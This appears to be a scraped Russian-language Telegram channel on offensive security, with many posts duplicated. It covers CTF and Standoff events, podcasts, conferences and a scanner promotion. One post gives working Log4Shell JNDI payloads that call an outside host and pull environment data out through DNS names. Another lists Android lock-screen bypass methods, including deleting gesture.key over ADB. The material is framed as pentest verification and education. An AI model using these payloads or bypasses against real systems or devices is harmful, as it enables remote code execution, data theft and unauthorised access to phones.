CTF task-based offline для молодежи с ограничениями по здоровью.
5 декабря 2021 в Москве (YotaArena) состоится III Чемпионат по кибербезопасности и киберспорту для молодежи с особыми потребностями.
Среди дисциплин - CTF, командное и индивидуальное соревнование по решению прикладных задач информационной безопасности: поиск и эксплуатация уязвимостей приложений, анализ исходного кода, криптография, форензика, ОСИНТ.
А среди организаторов - лучшие лица и учителя информационной безопасности, создатели PHD - компания Positive Technologies.
Прийти поболеть может каждый. Победители и участники получают призы, мероприятие с мерчем, концертом, крутыми спонсорами и випами.
Если у вас есть знакомые дети, подростки, студенты, готовые попробовать себя в DOTA2, Dron Racing (DCL) и CTF - скиньте им ссылку на регистрацию wugamers.ru или в тг-лс @snailrabbit.
5 декабря 2021 в Москве (YotaArena) состоится III Чемпионат по кибербезопасности и киберспорту для молодежи с особыми потребностями.
Среди дисциплин - CTF, командное и индивидуальное соревнование по решению прикладных задач информационной безопасности: поиск и эксплуатация уязвимостей приложений, анализ исходного кода, криптография, форензика, ОСИНТ.
А среди организаторов - лучшие лица и учителя информационной безопасности, создатели PHD - компания Positive Technologies.
Прийти поболеть может каждый. Победители и участники получают призы, мероприятие с мерчем, концертом, крутыми спонсорами и випами.
Если у вас есть знакомые дети, подростки, студенты, готовые попробовать себя в DOTA2, Dron Racing (DCL) и CTF - скиньте им ссылку на регистрацию wugamers.ru или в тг-лс @snailrabbit.
Много раз натыкался в твиттере на всякие полезности от HackerScrolls, и думал что это какая-то иностранная компания пиарится.
А сегодня узнал, что это наши ребята из компании DigitalSecurity начали шарить знания во вне!
Они рассказывают об этом в подкасте: https://music.yandex.ru/album/10321679/track/80252481 (Рекомендую послушать о культуре шаринга знаний, об обучении и сертификатах).
А все полезности собраны в GitHub: https://github.com/hackerscrolls/SecurityTips
И в телеграм: https://news.1rj.ru/str/hackerscrolls
А сегодня узнал, что это наши ребята из компании DigitalSecurity начали шарить знания во вне!
Они рассказывают об этом в подкасте: https://music.yandex.ru/album/10321679/track/80252481 (Рекомендую послушать о культуре шаринга знаний, об обучении и сертификатах).
А все полезности собраны в GitHub: https://github.com/hackerscrolls/SecurityTips
И в телеграм: https://news.1rj.ru/str/hackerscrolls
Яндекс Музыка
Выпуск #5 - Сертификаты, обучение и HackerScroll...
Эт я
P.S.
Ссылочка появилась: https://standoff365.com/media/the-standoff-nov-21/main-stage/mozhno-li-nauchit-khakerstvu/
P.S.
Ссылочка появилась: https://standoff365.com/media/the-standoff-nov-21/main-stage/mozhno-li-nauchit-khakerstvu/
Forwarded from Positive Events
Как стать хакером? Белым, конечно же 😉
Прямо сейчас в эфире Егор Богомолов из HackerU рассказывает про образование и практический опыт
Прямо сейчас в эфире Егор Богомолов из HackerU рассказывает про образование и практический опыт
Standoff365
Standoff 365
Standoff 365 — платформа для исследователей безопасности, которая включает в себя киберполигон, багбаунти и митапы.
#phdays #theStandoff
Ну чтож, время рассказать о прошедших событиях.
В эти 3 дня, с утра воскресенья (14.11) и до обеда вторника (16.11), мы (команда True0xA3 - Тру ОАЗ) участвовали в турнире The Standoff.
Надо сказать, что в ноябре ребята из PT делают чуть менее масштабное событие, всего 10 команд атакующих, отобранных по предыдущим играм, и 5 команд защитников. Тем не менее, инфраструктура была не менее громадной. Много чего хочется рассказать о прошедшем: о наших действиях, о соперничестве с командами, о том что нас ждало внутри инфраструктуры уже не кибергорода а киберстраны, но на это не хватит сообщения, поэтому попросту отмечу тут наши результаты, участников и наш отзыв.
В этом году мы заняли второе место среди 10 команд. Как водится мы вновь разменяли позиции с все теми же заклятыми соперниками;) (ни в коем случае не более того), с которыми меняемся местами уже не первый год. От этого как мне кажется, каждый Standoff становится еще интереснее для нас, т.к. ни разу пока ни кто не выигрывал два раза подряд, и мы все ждем этого момента с нетерпением. Это как те партии в шахматы или любые другие "качели" из соревновательных игр. Только попытка у нас раз в полгода.
В этот раз инфраструктура не порадовала нас пробивами доменов или богатой поверхностью атаки. Сеть была построена так, что все должны были идти стройной дорожкой через ряд DMZ'тов (демилитаризованных зон), развернуться по сетям удалось только под конец игры, когда уже было поздновато. Однако внутри сети нас ждало уже более 45 (еще пяток был собран по дороге) разных целей для атаки (возможных для реализации рисков), от которых разбегались глаза.
Если кратко, в этот раз инфраструктура была сложнее, защищеннее и прямолинейнее. Об этом говорит и то число рисков, которое удалось реализовать. (Не более 6 рисков среди всех команд).
В заключение повторю мантру прошлых лет: The Standoff - это для несгибаемых ребят, обладающих всем спектром навыков по атакам на информационные системы и слаженностью высокого уровня.
Здесь отмечу имена победителей, кто потратил любую долю своего времени в целях победы:
Иван Булавин
Павел Шлюндин
Роман Алфёров
Азиз Алимов
Сергей Гилев
Андрей Рогожкин
Константин Костеневский
Алексей Хайдин
Сергей Колесников
Саид Эфендиев
Николай Топорков
Никита Чистяков
Егор Богомолов
Антон Прохоров
Вячеслав Цепенников
Игорь Мотрони
Дмитрий Фролов
Спасибо всей моей команде за слаженность и поддержку, и спасибо каждому кто болел за нас;)
Ждем следующей возможности проявить себя!
Ну чтож, время рассказать о прошедших событиях.
В эти 3 дня, с утра воскресенья (14.11) и до обеда вторника (16.11), мы (команда True0xA3 - Тру ОАЗ) участвовали в турнире The Standoff.
Надо сказать, что в ноябре ребята из PT делают чуть менее масштабное событие, всего 10 команд атакующих, отобранных по предыдущим играм, и 5 команд защитников. Тем не менее, инфраструктура была не менее громадной. Много чего хочется рассказать о прошедшем: о наших действиях, о соперничестве с командами, о том что нас ждало внутри инфраструктуры уже не кибергорода а киберстраны, но на это не хватит сообщения, поэтому попросту отмечу тут наши результаты, участников и наш отзыв.
В этом году мы заняли второе место среди 10 команд. Как водится мы вновь разменяли позиции с все теми же заклятыми соперниками;) (ни в коем случае не более того), с которыми меняемся местами уже не первый год. От этого как мне кажется, каждый Standoff становится еще интереснее для нас, т.к. ни разу пока ни кто не выигрывал два раза подряд, и мы все ждем этого момента с нетерпением. Это как те партии в шахматы или любые другие "качели" из соревновательных игр. Только попытка у нас раз в полгода.
В этот раз инфраструктура не порадовала нас пробивами доменов или богатой поверхностью атаки. Сеть была построена так, что все должны были идти стройной дорожкой через ряд DMZ'тов (демилитаризованных зон), развернуться по сетям удалось только под конец игры, когда уже было поздновато. Однако внутри сети нас ждало уже более 45 (еще пяток был собран по дороге) разных целей для атаки (возможных для реализации рисков), от которых разбегались глаза.
Если кратко, в этот раз инфраструктура была сложнее, защищеннее и прямолинейнее. Об этом говорит и то число рисков, которое удалось реализовать. (Не более 6 рисков среди всех команд).
В заключение повторю мантру прошлых лет: The Standoff - это для несгибаемых ребят, обладающих всем спектром навыков по атакам на информационные системы и слаженностью высокого уровня.
Здесь отмечу имена победителей, кто потратил любую долю своего времени в целях победы:
Иван Булавин
Павел Шлюндин
Роман Алфёров
Азиз Алимов
Сергей Гилев
Андрей Рогожкин
Константин Костеневский
Алексей Хайдин
Сергей Колесников
Саид Эфендиев
Николай Топорков
Никита Чистяков
Егор Богомолов
Антон Прохоров
Вячеслав Цепенников
Игорь Мотрони
Дмитрий Фролов
Спасибо всей моей команде за слаженность и поддержку, и спасибо каждому кто болел за нас;)
Ждем следующей возможности проявить себя!
#podcast
С пылу, с жару, спешу порадовать вас новым записанным подкастом!
В этот раз я поговорил с Денисом Рыбиным (Head of AppSec - бывшего Mail.ru, нынешнего бизнес юнита Mail.ru в VK) о том, кто такие AppSec специалисты, чем они отличаются от пентестров, чем отличается их скиллсет и траектория обучения, а также обо всем, что окружает их в работе!
Мне кажется наш подкаст становится с каждым разом все лучше и лучше, надеюсь вы это тоже оцените.
Все вопросы можете оставлять в чате, Я и Денис сможем на них поотвечать.
Егор Богомолов и Денис Рыбин — Взгляд на работу AppSec специалиста изнутри (https://podcast.ru/1589311841)
С пылу, с жару, спешу порадовать вас новым записанным подкастом!
В этот раз я поговорил с Денисом Рыбиным (Head of AppSec - бывшего Mail.ru, нынешнего бизнес юнита Mail.ru в VK) о том, кто такие AppSec специалисты, чем они отличаются от пентестров, чем отличается их скиллсет и траектория обучения, а также обо всем, что окружает их в работе!
Мне кажется наш подкаст становится с каждым разом все лучше и лучше, надеюсь вы это тоже оцените.
Все вопросы можете оставлять в чате, Я и Денис сможем на них поотвечать.
Егор Богомолов и Денис Рыбин — Взгляд на работу AppSec специалиста изнутри (https://podcast.ru/1589311841)
Podcast.ru
MasterTalk – Podcast.ru
Эксперты компании CyberEd разговаривают с представителями IT-индустрии о том, как складывается их карьерный путь и куда расти специалисту. Рассказываем, как разработчику и пентестеру повысить свою квалификацию и какие вообще существуют пути для роста. Чем…
👍1
Я этого действительно уже заждался. Одна из самых толковых конференций в РФ.
🚩Конференция OFFZONE пройдет 25–26 августа 2022 года 🚩
Международная конференция по практической кибербезопасности OFFZONE уже в третий раз пройдет в Москве с 25 по 26 августа 2022 года в очном формате.
Тщательно подобранный контент, любимое комьюнити и, конечно, уютная атмосфера постапа — все остается на местах.
К сожалению, ни в прошлом, ни в позапрошлом годах конференцию провести не удалось в связи со сложной эпидеомиологической обстановкой. К счастью, правила проведения массовых мероприятий более-менее устаканились, поэтому удалось определиться с датой.
Билетов пока нет в продаже, но уже скоро они появятся — планируйте бюджет заранее.
Цены, локация, спикеры, доклады — обо всем этом позже.
Следите за новостями на сайте конференции и в соцсетях:
• Телеграм-канал
• Twitter
• Instagram
• Facebook
🚩Конференция OFFZONE пройдет 25–26 августа 2022 года 🚩
Международная конференция по практической кибербезопасности OFFZONE уже в третий раз пройдет в Москве с 25 по 26 августа 2022 года в очном формате.
Тщательно подобранный контент, любимое комьюнити и, конечно, уютная атмосфера постапа — все остается на местах.
К сожалению, ни в прошлом, ни в позапрошлом годах конференцию провести не удалось в связи со сложной эпидеомиологической обстановкой. К счастью, правила проведения массовых мероприятий более-менее устаканились, поэтому удалось определиться с датой.
Билетов пока нет в продаже, но уже скоро они появятся — планируйте бюджет заранее.
Цены, локация, спикеры, доклады — обо всем этом позже.
Следите за новостями на сайте конференции и в соцсетях:
• Телеграм-канал
О, действительно любопытно. Думаю многим бы хотелось знать типовые подходы по обходу экрана блокировки Android.
Forwarded from Android Guards
Интересный доклад с прошедшего недавно митапа OWASP Melbourne, в котором рассказывается история человека пытающегося обойти экран блокировки путем подбора пин-кода.
Доклад совершенно ненапряжный и его можно посмотреть просто по фану. Там показано довольно много способов решения этой задачи и не исключено, что те, котрые не сработали у него - сработают у вас.
Способы такие:
1. Попробовать руками первые 20 вариантов из списка DataGenetics Research
2. Проверить комбинации важных дат (дни рождения, дни свадьбы, последние 4 цифры номера телефона, слова вроде LOVE,FUCK,etc... в T9 варианте)
3. Использовать Find My Device от Google
4. Использовать Find My Mobile от Samsung (или аналоги от других вендоров)
5. CVE-2015-3860 - крэш экрана блокировки на Samsung. Можно поискать аналоги у других вендоров
6. Использовать ADB чтобы удалить файл с пин-кодом/паттерном
7. Воспользоваться вот этим списком из еще 7ми способов с форума XDA
8. Попробовать специальные утилиты и устройства для мобильной криминалистики (forensic tools): Cellebrite, Oxygen, XRY, GrayKey, Octoplus, Odin + TWRP
9. Поискать публичные эксплойты
10. Использовать USB Rubber Ducky или аналоги (опционально спаять свой)
999. Выполнить сброс к заводским настройкам
Happy hacking 😎
tl;dr - обошел с помощью NetHunter-а, OTG кабеля и самописного скрипта для брутфорса. Скрипт забирайте здесь.Доклад совершенно ненапряжный и его можно посмотреть просто по фану. Там показано довольно много способов решения этой задачи и не исключено, что те, котрые не сработали у него - сработают у вас.
Способы такие:
1. Попробовать руками первые 20 вариантов из списка DataGenetics Research
2. Проверить комбинации важных дат (дни рождения, дни свадьбы, последние 4 цифры номера телефона, слова вроде LOVE,FUCK,etc... в T9 варианте)
3. Использовать Find My Device от Google
4. Использовать Find My Mobile от Samsung (или аналоги от других вендоров)
5. CVE-2015-3860 - крэш экрана блокировки на Samsung. Можно поискать аналоги у других вендоров
6. Использовать ADB чтобы удалить файл с пин-кодом/паттерном
/data/system/gesture.key7. Воспользоваться вот этим списком из еще 7ми способов с форума XDA
8. Попробовать специальные утилиты и устройства для мобильной криминалистики (forensic tools): Cellebrite, Oxygen, XRY, GrayKey, Octoplus, Odin + TWRP
9. Поискать публичные эксплойты
10. Использовать USB Rubber Ducky или аналоги (опционально спаять свой)
999. Выполнить сброс к заводским настройкам
Happy hacking 😎
YouTube
[Live🔴] The Mobile Sec Special - Melbourne Chapter (Virtual) Meetup - 23rd Nov 2021
Details here:
https://www.meetup.com/Application-Security-OWASP-Melbourne/events/282160343/
Chapter Survey: https://forms.gle/35e5gXWs5SX9xiG7A
Chat on Discord
https://discord.gg/uAWze2B
https://www.meetup.com/Application-Security-OWASP-Melbourne/events/282160343/
Chapter Survey: https://forms.gle/35e5gXWs5SX9xiG7A
Chat on Discord
https://discord.gg/uAWze2B
#podcast
Подкаст!
Спешу порадовать записью нового выпуска подкаста MasterTalk;)
По прошествии TheStandoff мне оч. захотелось познакомить публику с капитаном нашей команды True0xA3, а также обсудить ряд тем:
1. Чуть конкретнее рассказать о произошедшем на турнире.
2. Поговорить о “внутренностях” нашей команды.
3. Поговорить об особенностях работы капита в подобных хакерских турнирах.
4. И в конце обсудить подобные подходы к корпоративному обучению и его целесообразоности.
Приятного прослушивания: https://podcast.ru/1589311841
Подкаст!
Спешу порадовать записью нового выпуска подкаста MasterTalk;)
По прошествии TheStandoff мне оч. захотелось познакомить публику с капитаном нашей команды True0xA3, а также обсудить ряд тем:
1. Чуть конкретнее рассказать о произошедшем на турнире.
2. Поговорить о “внутренностях” нашей команды.
3. Поговорить об особенностях работы капита в подобных хакерских турнирах.
4. И в конце обсудить подобные подходы к корпоративному обучению и его целесообразоности.
Приятного прослушивания: https://podcast.ru/1589311841
Podcast.ru
MasterTalk – Podcast.ru
Эксперты компании CyberEd разговаривают с представителями IT-индустрии о том, как складывается их карьерный путь и куда расти специалисту. Рассказываем, как разработчику и пентестеру повысить свою квалификацию и какие вообще существуют пути для роста. Чем…
Forwarded from MlsWarrior
Merry christmas
Exploitation guide
https://www.lunasec.io/docs/blog/log4j-zero-day/
Attack surface
https://github.com/YfryTchsGD/Log4jAttackSurface
#rce #0day #java #ldap
Exploitation guide
https://www.lunasec.io/docs/blog/log4j-zero-day/
Attack surface
https://github.com/YfryTchsGD/Log4jAttackSurface
#rce #0day #java #ldap
Forwarded from BI.ZONE
Как проверить, уязвимы ли вы к Log4Shell
Log4Shell — это критическая уязвимость в библиотеке логирования Log4j, которую используют многие веб-приложения на Java. Эксплуатация уязвимости приводит к удаленному выполнению кода (RCE), эксплоит уже опубликован, и ему подвержены все версии библиотеки до 2.15.0.
Проблема в том, что нет простого способа выяснить, использует ли приложение библиотеку Log4j. Веб-сканеры на основе эксплоитов — не выход: они могут пропустить уязвимое приложение.
Поэтому мы разработали свой сканер на основе YARA-правила, и он работает не из интернета, а на хосте. Его задача — просканировать память процессов Java на наличие сигнатур библиотеки Log4j.
На выходе вы получите перечень хостов, на которых есть приложения с Log4j, и сможете проверить версию библиотеки.
Если версия окажется уязвимой — пригодится этот разбор превентивных мер.
Удачи!
Log4Shell — это критическая уязвимость в библиотеке логирования Log4j, которую используют многие веб-приложения на Java. Эксплуатация уязвимости приводит к удаленному выполнению кода (RCE), эксплоит уже опубликован, и ему подвержены все версии библиотеки до 2.15.0.
Проблема в том, что нет простого способа выяснить, использует ли приложение библиотеку Log4j. Веб-сканеры на основе эксплоитов — не выход: они могут пропустить уязвимое приложение.
Поэтому мы разработали свой сканер на основе YARA-правила, и он работает не из интернета, а на хосте. Его задача — просканировать память процессов Java на наличие сигнатур библиотеки Log4j.
На выходе вы получите перечень хостов, на которых есть приложения с Log4j, и сможете проверить версию библиотеки.
Если версия окажется уязвимой — пригодится этот разбор превентивных мер.
Удачи!
GitHub
GitHub - bi-zone/Log4j_Detector: Detection of Log4j in memory
Detection of Log4j in memory. Contribute to bi-zone/Log4j_Detector development by creating an account on GitHub.
Forwarded from CyberED (hackerurussiabot)
😉 Как будет выглядеть The Standoff 365?
В шестом выпуске подкаста Mastertalk Егор Богомолов разговаривает с Ярославом Бабиным о карьере в offensive и будущем The Standoff.
Ярослав Бабин — руководитель отдела анализа защищенности Positive Technologies и один из ключевых организаторов The Standoff. Сейчас его компания готовит к запуску платформу The Standoff 365. В новом выпуске вы узнаете:
⚡️ зачем становиться руководителем в ИБ;
⚡️ почему иногда важно не получить свою первую работу;
⚡️ как выглядит сотрудничество с осознанными клиентами;
⚡️ как будет устроен The Standoff 365;
⚡️ зачем новая платформа компаниям.
Если вы давно интересовались темой турнира The Standoff или сами хотите поучаствовать, этот выпуск — ваш шанс узнать больше.
В шестом выпуске подкаста Mastertalk Егор Богомолов разговаривает с Ярославом Бабиным о карьере в offensive и будущем The Standoff.
Ярослав Бабин — руководитель отдела анализа защищенности Positive Technologies и один из ключевых организаторов The Standoff. Сейчас его компания готовит к запуску платформу The Standoff 365. В новом выпуске вы узнаете:
⚡️ зачем становиться руководителем в ИБ;
⚡️ почему иногда важно не получить свою первую работу;
⚡️ как выглядит сотрудничество с осознанными клиентами;
⚡️ как будет устроен The Standoff 365;
⚡️ зачем новая платформа компаниям.
Если вы давно интересовались темой турнира The Standoff или сами хотите поучаствовать, этот выпуск — ваш шанс узнать больше.
Статическими майндмапами и аггрегаторами инфы уже никого не удивишь.
Подъехал пополняемый формат знаний о пентесте и все вокруг него:
https://www.mindmeister.com/ru/1756305170?t=I99P4f4KNO
Подъехал пополняемый формат знаний о пентесте и все вокруг него:
https://www.mindmeister.com/ru/1756305170?t=I99P4f4KNO
Log4j
Хотел донести до тех, кто как и я не сразу узнал про различные трюки в уязвимости Log4Shell. А конкретно о том, как красиво и правильно подтвердить уязвимость в Log4j, когда при эксплуатации прилетает только DNS запрос вашего доменного имени. (Ведь это может быть False-Positive, в случае если какой-нибудь WAF или еще что-нибудь видит в трафике домен и запрашивает его для проверки.
При эксплуатации уязвимости вектор приводящий к возможности выполнения кода через сборку вашего внешнего объекта выглядит следующим образом:
- Для поиска объекта через LDAP:
- Или тоже самое для RMI:
Следует отметить, что здесь конструкции
Соответственно, если у вас не удается получить LDAP/RMI запрос на свой сервер, первое что можно сделать, это проверить не фильтруется ли трафик по определенным портам. А значит, перебираем возможные порты в нашей конструкции:
Если запрос не пришел, но вы видите, что DNS запрос имени происходит, проверьте можете ли вы создать DNS имя, которое позволит вам вытащить какие-нибудь данные из окружения приложения, например:
Также в случае каких-либо еще вопросов к вашему случаю с детектом Log4j, попробуйте банально поломать схему обращения и посмотреть появится ли DNS запрос (**помните, что DNS имена нужно постоянно изменять, т.к. они кешируются**):
Если DNS запрос все еще приходит, значит дело не в Log4j, а в каком либо компоненте системы, который выдергивает все доменные имена из трафика и проверяет их.
Хотел донести до тех, кто как и я не сразу узнал про различные трюки в уязвимости Log4Shell. А конкретно о том, как красиво и правильно подтвердить уязвимость в Log4j, когда при эксплуатации прилетает только DNS запрос вашего доменного имени. (Ведь это может быть False-Positive, в случае если какой-нибудь WAF или еще что-нибудь видит в трафике домен и запрашивает его для проверки.
При эксплуатации уязвимости вектор приводящий к возможности выполнения кода через сборку вашего внешнего объекта выглядит следующим образом:
- Для поиска объекта через LDAP:
${jndi:ldap://empty.jack.su/exploit}- Или тоже самое для RMI:
${jndi:rmi://empty.jack.su/exploit}Следует отметить, что здесь конструкции
${...} называются Lookup'ы. (Их много и они разные: https://logging.apache.org/log4j/2.x/manual/lookups.html) Они используются в Log4j для получения различной информации из окружения приложения и подстановки ее в конфигурацию Log4j. Lookup'ы могут быть вложенными. Т.е. можно сформировать следующую конструкцию ${lower:${base64:ZW10cHkuamFjaw==}}, что сначала раскодирует значение в Base64, а потом переведет его в нижний регистр.Соответственно, если у вас не удается получить LDAP/RMI запрос на свой сервер, первое что можно сделать, это проверить не фильтруется ли трафик по определенным портам. А значит, перебираем возможные порты в нашей конструкции:
${jndi:ldap://empty.jack.su:3333/exploit}Если запрос не пришел, но вы видите, что DNS запрос имени происходит, проверьте можете ли вы создать DNS имя, которое позволит вам вытащить какие-нибудь данные из окружения приложения, например:
${jndi:ldap://empty-${java:runtime}-${java:vm}-${java:os}-empty.jack.su:3333/exploit}Также в случае каких-либо еще вопросов к вашему случаю с детектом Log4j, попробуйте банально поломать схему обращения и посмотреть появится ли DNS запрос (**помните, что DNS имена нужно постоянно изменять, т.к. они кешируются**):
${jndi:asdf://empty123.jack.su/exploit}Если DNS запрос все еще приходит, значит дело не в Log4j, а в каком либо компоненте системы, который выдергивает все доменные имена из трафика и проверяет их.
Интересные Lookup’ы из мана по Log4j Lookups:
Если вы знаете еще что-то интересное, welcome в комментарии под постами!;)
${docker:containerName}
${docker:imageName}
${env:USER}
${env:HOME}
${env:PWD}
${java:version}
${java:runtime}
${java:os}
${docker:hostIp}
${docker:host}
${docker:accountName}
${docker:clusterName}
${docker:podName}
${docker:masterUrl}
${spring:spring.application.name}
${sys:logPath}
${web:rootDir}
${web:serverInfo}
Если вы знаете еще что-то интересное, welcome в комментарии под постами!;)
XSignal
Мои знакомы создали интересный продукт. Продукт XSignal - это облачный сканер уязвимостей внешнего периметра сетевой инфраструктуры.
Но что в нем особенного?
Пользователь лицензии сразу после скана, может внутри личного кабинета выбрать Эксперта по ИБ/Пентестера, с которым может связаться для работы над найденной уязвимостью. Специалист может помочь проверить ее, дать детальные рекомендации и объяснить суть уязвимости, выполнить работу по перепроверке или вообще провести работы по анализу защищенности за вознаграждение.
Т.е. внутри находится маркетплейс со специалистами, где вы видите их рейтинг, отзывы, цены на время специалиста, его опыт, сертификации и пр.
Как мне кажется, это очень интересная особенность продукта, особенно для компаний среднего и малого бизнеса, которые могут проверить самое критичное место в свой ИТ-инфраструктуре (ее внешний периметр) и сразу же найти проверенного исполнителя заплатив ему всего за несколько часов работы, что будет стоить несоразмерно меньше, чем любой из возможных пентестов от аудиторов.
Но сюда я пишу не только для того, чтобы рассказать о нем потенциальным клиентам, но для того, чтобы рассказать о возможностях партнерства моим коллегам пентестерам.
Пентестеры могут присоединить к этой платформе, где будут размещены их профили для взаимодействия с ними, получат сканер в бесплатное использование и смогут получать вознаграждения за пополнение базы сканера полезностями.
Если у вас есть вопросы по сотрудничеству как со стороны использования сканера, так и со стороны партнерства, пишите: @gorbunov_me
До 31 января 2022 года действует спец. предложение (первым 50 клиентам, оплатившим годовую подписку):
1) Сделают бесплатно под ключ интеграцию в CI/CD (битбакет, гитхаб, гитлаб)
2) Дадут скидку в 50% от стоимости.
Мои знакомы создали интересный продукт. Продукт XSignal - это облачный сканер уязвимостей внешнего периметра сетевой инфраструктуры.
Но что в нем особенного?
Пользователь лицензии сразу после скана, может внутри личного кабинета выбрать Эксперта по ИБ/Пентестера, с которым может связаться для работы над найденной уязвимостью. Специалист может помочь проверить ее, дать детальные рекомендации и объяснить суть уязвимости, выполнить работу по перепроверке или вообще провести работы по анализу защищенности за вознаграждение.
Т.е. внутри находится маркетплейс со специалистами, где вы видите их рейтинг, отзывы, цены на время специалиста, его опыт, сертификации и пр.
Как мне кажется, это очень интересная особенность продукта, особенно для компаний среднего и малого бизнеса, которые могут проверить самое критичное место в свой ИТ-инфраструктуре (ее внешний периметр) и сразу же найти проверенного исполнителя заплатив ему всего за несколько часов работы, что будет стоить несоразмерно меньше, чем любой из возможных пентестов от аудиторов.
Но сюда я пишу не только для того, чтобы рассказать о нем потенциальным клиентам, но для того, чтобы рассказать о возможностях партнерства моим коллегам пентестерам.
Пентестеры могут присоединить к этой платформе, где будут размещены их профили для взаимодействия с ними, получат сканер в бесплатное использование и смогут получать вознаграждения за пополнение базы сканера полезностями.
Если у вас есть вопросы по сотрудничеству как со стороны использования сканера, так и со стороны партнерства, пишите: @gorbunov_me
До 31 января 2022 года действует спец. предложение (первым 50 клиентам, оплатившим годовую подписку):
1) Сделают бесплатно под ключ интеграцию в CI/CD (битбакет, гитхаб, гитлаб)
2) Дадут скидку в 50% от стоимости.
bit-signal.ru
BITsignal – сканер веб-уязвимостей в ИТ-инфраструктуре
Онлайн сервис для сканирования уязвимостей сайтов, web-приложений, сетевой инфрастуктуры бизнеса. BITsignal – прекрасное локальное решение для поиска и тестирования веб-уязвимостей.